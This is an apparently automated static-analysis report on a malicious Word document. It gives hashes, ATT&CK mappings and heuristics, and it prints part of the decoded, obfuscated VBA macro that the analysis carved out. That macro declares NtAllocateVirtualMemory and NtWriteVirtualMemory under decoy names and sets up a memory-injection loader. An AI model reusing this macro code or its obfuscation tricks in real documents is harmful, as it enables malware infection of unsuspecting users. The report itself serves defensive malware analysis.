Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 469000a4992334fd…

MALICIOUS

Office (OLE)

Size: 223.5 KB
Created: 2017-11-09 12:44:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 58e69c70eebd7185286745772a2b3aca
SHA-1: 74cc609b7f5bb94eb07d32a17f6983a601026250
SHA-256: 469000a4992334fdaed60ffb036b9d7c4ab7c326ed233d32142e460d4f4c36f0
Risk Score: 62

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is an OLE document with a large slack space anomaly and detected VBA macros. The VBA macro code uses PtrSafe declarations for functions like NtAllocateVirtualMemory and NtWriteVirtualMemory, indicating an attempt to manipulate memory, likely for executing a downloaded payload. The presence of these memory manipulation functions suggests a downloader or dropper functionality.

Heuristics (3)

  • OLE document has large unaccounted-for region (severity: high, rule: OLE_SLACK_ANOMALY)
    OLE file is 228,864 bytes but its declared streams total only 126,155 bytes — 102,709 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed here is an XML namespace identifier (Adobe XMP, RDF, Dublin Core, DrawingML) of the kind carried in embedded image and drawing metadata, not a network contact indicator.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5149 bytes
SHA-256: b0e241acff3f74ce19239ce70155217d9cb259fd4b58e6c51c6e9fb007a2357a
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "mims"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Es ist kalt und regungslos
Public Declare Function bronchoscopic _
Lib "Ntdll  " alias _
"NtAllocateVirtualMemory" (predict As Long, nonobservance As Long, ByVal drapery As Long, unpretentiouslyByVal As Long, abulic As Long, ByVal biauricular As Long) As Long
'  And I can not resist
'  Die Nacht öffnet ihren Schoß
Public Declare Function profluence Lib "Shlwapi.dll  " alias "GetOverlappedResult" (ByVal besides As Any, aqualung As Any, gristle As Any, extragalactic As Any) As Long
'  Stirb nicht
'  Your love I can't dismiss
#End If
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Stirb nicht
'  Ich warte hier
Public Declare PtrSafe Function adamantly _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal isometric As Any, ByVal magnetism As Any, ByVal dietetics As Any, ByVal rimless As Any, ByVal petroleuse As Any) As LongPtr
'  Ich warte hier'  I dont know who he is
Public Declare PtrSafe Function mirage Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal semantically As Any, minimization As Any, guideless As Any, high As Any) As LongPtr
'  Ich weiAY nicht wie du heiAYt
Public Declare PtrSafe Function bronchoscopic _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (pascit As LongPtr, diver As LongPtr, ByVal dairying As LongPtr, introjectedByVal As LongPtr, rile As LongPtr, ByVal attaboy As LongPtr) As LongPtr

#End If
'  Es ist kalt und regungslos
'  With his hands around my neck

Function dejaniras()
backbiting.terrorist.Value = Day(#12/5/2013#)
Set clumsily = backbiting.terrorist.SelectedItem
coadjuvancy = 100 + 6
Pmt 0, coadjuvancy, 31224, 45683, 5
uncertainty = clumsily.Name
aureole = 18 - 104 + 7930
baiza = Right(uncertainty, aureole)
castoridae = modmin.procacity(baiza)
venule = 70 + 4
Pmt 0, venule, 34638, 47355, 4
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim opossum As LongPtr
Dim palisade As LongPtr
Dim agoraphobia As LongPtr
Dim benumbed As LongPtr
Dim peremptorily As LongPtr
copula = 68 - 125 + 2121
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim palisade As Long
Dim opossum As Long
Dim agoraphobia As Long
gloxinia = 3 - 122 + 900
Dim benumbed As Long
Dim peremptorily As Long
copula = gloxinia + 3459
#End If
hypothecate = 125 - 121 - 4
cunctando = 110 + 8
Pmt 0, cunctando, 25604, 19497, 7
adaptable = 10 + 9
Pmt 0, adaptable, 35678, 19550, 4
alphitomancy = castoridae
opossum = faciles(alphitomancy)
agoraphobia = 83 - 46 - 37
palisade = opossum + copula
benumbed = 100 - 120 + 201547
peremptorily = 46 - 41 + 3495
dehydrated = vicious(benumbed, _
agoraphobia, _
palisade, agoraphobia, agoraphobia, agoraphobia, _
agoraphobia)
heedful = 6 - 4
Pmt 0, heedful, 26431, 39038, 7
End Function


Function faciles(opalescence)
Dim dew As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim sauce As Long
Dim antic As LongPtr
startlingly = 97 - 72 - 17
Dim miserly As LongPtr
Dim anatomist As Integer
Dim coachman As Long
Dim heavendirected As LongPtr
Dim cormorant As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim antic As Long
startlingly = 67 - 82 + 19
Dim miserly As Long
Dim heavendirected As Long
#End If
aepyceros = VarPtr(antic)
ivorybill = enormity(aepyceros, VarPtr(opalescence) + 8, startlingly)
absolutism = 22 - 127 + 104
miserly = 53 - 25 - 28
hairlessness = 30 - 105 + 75
heavendirected = 36 - 20 + 9286
dew = 21 - 14 + 4089
telegram = 104 - 122 + 82
coceive = bronchoscopic(ByVal absolutism, _
miserly, ByVal hairlessness, heavendirected, ByVal dew, _
ByVal telegram)
patriarchs = Fix(415)
hypernym = gazingstock
enormity miserly, antic, 96 - 3 + 5790
flammulina = 50 + 6
Pmt 0, flammulina, 6078, 19080, 3
faciles = miserly
End Function

Function enormity(habituated, grosgrain, gordian)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim chuckwall
... (truncated)